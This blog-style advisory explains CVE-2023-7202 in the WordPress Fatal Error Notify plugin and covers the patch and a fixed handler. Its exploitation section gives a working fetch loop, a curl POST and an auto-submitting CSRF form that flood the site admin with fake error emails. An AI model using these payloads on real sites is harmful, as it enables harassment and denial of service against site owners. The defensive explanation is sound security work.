The WordPress ecosystem is enormous and, unfortunately, so is the attack surface. In December 2023, a critical vulnerability surfaced in the widely-used Fatal Error Notify plugin—tracked as CVE-2023-7202—and it allowed even low-level users to spam the admin email with fake error messages. Even worse, attackers could automate this tactic with a bit of clever web trickery known as CSRF. In this post, I’ll break down what happened, how the exploit works, and how you can protect yourself.
Quick Summary
Vulnerability: No authorization or CSRF checks for a sensitive AJAX action
Affected Versions: Fatal Error Notify before 1.5.3
Risk: Authenticated users (even Subscribers) and attackers via CSRF can spam admin emails
Patched in: v1.5.3
CVE: CVE-2023-7202
How Does the Vulnerability Work?
The Fatal Error Notify plugin helps WordPress admins by emailing them when their site triggers a PHP error. But the plugin performed no checks at all on its test_error AJAX action. That means *any* logged-in user, even the lowliest Subscriber, could make the plugin fire off test emails at will.
What’s even more alarming? There was no CSRF (Cross-Site Request Forgery) protection either, so any website could trick an admin (or any other logged-in user) into making these requests simply by getting them to visit a page.
Here’s a simplified idea of what the problematic function looked like:
add_action( 'wp_ajax_test_error', 'fen_trigger_test_error' );

function fen_trigger_test_error() {
    // No checks for user role or CSRF nonce!
    send_fatal_error_email( 'This is a test error' );
    wp_send_json_success( 'Email sent!' );
}
Exploiting the Vulnerability
Let’s say you’re logged in as a Subscriber on a site running a vulnerable version of Fatal Error Notify. You can easily spam the admin by sending requests to:
POST /wp-admin/admin-ajax.php?action=test_error
If you wanted to trigger a flood of error emails, open the browser console and paste:
for (let i = 0; i < 10; i++) {
    fetch('/wp-admin/admin-ajax.php?action=test_error', {credentials: 'include'});
}
Or, for a more classic approach, use curl:
curl -b cookies.txt \
    -X POST 'https://victimsite.com/wp-admin/admin-ajax.php' \
    -d 'action=test_error'
(You’d need to be logged in; export cookies from your browser.)
Exploiting with CSRF: No Login Needed
Here’s where it gets ugly: there’s no CSRF protection. So an attacker could set up a page like this:
<form action="https://victimsite.com/wp-admin/admin-ajax.php" method="POST" id="csrf-form">
    <input type="hidden" name="action" value="test_error">
</form>
<script>
    for (let i = 0; i < 10; i++) {
        document.getElementById('csrf-form').submit();
    }
</script>
If an admin (or any logged-in user) visits this page, *bang*: their browser sends the requests and the admin’s inbox fills up.
Why should you care?
- Denial of Service: Spam enough emails, and the admin mailbox becomes unusable or the site’s email-sending quota gets depleted.
Mitigation
Plugin Update: The Fatal Error Notify team fixed this in version 1.5.3 by:
- Adding a proper authorization check (current_user_can())
- Adding CSRF protection (check_ajax_referer())
So, update now. If you can’t, consider disabling the plugin until a fix is possible.
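For comparison with the vulnerable handler above, here is the same AJAX action with both checks in place. This is an added example, not the plugin’s own code; the function names, the 'fen_test_error' nonce action and the 'fen-admin' script handle are assumed for illustration.

```php
<?php
// Added example, not the plugin's own code: the test_error handler with the two
// checks the 1.5.3 fix introduced. Function names, the 'fen_test_error' nonce
// action and the 'fen-admin' script handle are assumptions for this example.

add_action( 'wp_ajax_test_error', 'fen_trigger_test_error' );

function fen_trigger_test_error() {
    // CSRF: require a valid nonce bound to this action and to the current user.
    // A third-party page cannot obtain it, so the CSRF form above no longer works.
    // On failure check_ajax_referer() ends the request with a 403 before any email.
    check_ajax_referer( 'fen_test_error', 'nonce' );

    // Authorization: a valid nonce only proves the request came from the site's
    // own page, not that the user may send notifications, so a Subscriber with a
    // nonce is still rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }

    send_fatal_error_email( 'This is a test error' ); // plugin helper, as on the page
    wp_send_json_success( 'Email sent!' );
}

// Hand the nonce to the admin-side script so legitimate requests can send it as
// the 'nonce' POST field (assumes a script with handle 'fen-admin' is enqueued
// on the plugin's settings page).
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'fen-admin', 'fenAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'fen_test_error' ),
    ) );
} );
```

The order matters: the nonce check stops cross-site requests, and the capability check stops low-privilege accounts, so both of the attack paths described in this post are closed only when both are present.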
References
- CVE-2023-7202 at NVD
- WPScan Advisory
- Plugin Homepage
TL;DR
If you’re running Fatal Error Notify earlier than v1.5.3, anyone with an account—or via CSRF—can spam your admin inbox with fake PHP errors. Update your plugin (or disable it) to stay safe.
Want to learn more about securing WordPress? Drop your questions below or check out the provided references. Stay safe out there!
Timeline
Published on: 02/27/2024 09:15:37 UTC
Last modified on: 10/28/2024 00:35:02 UTC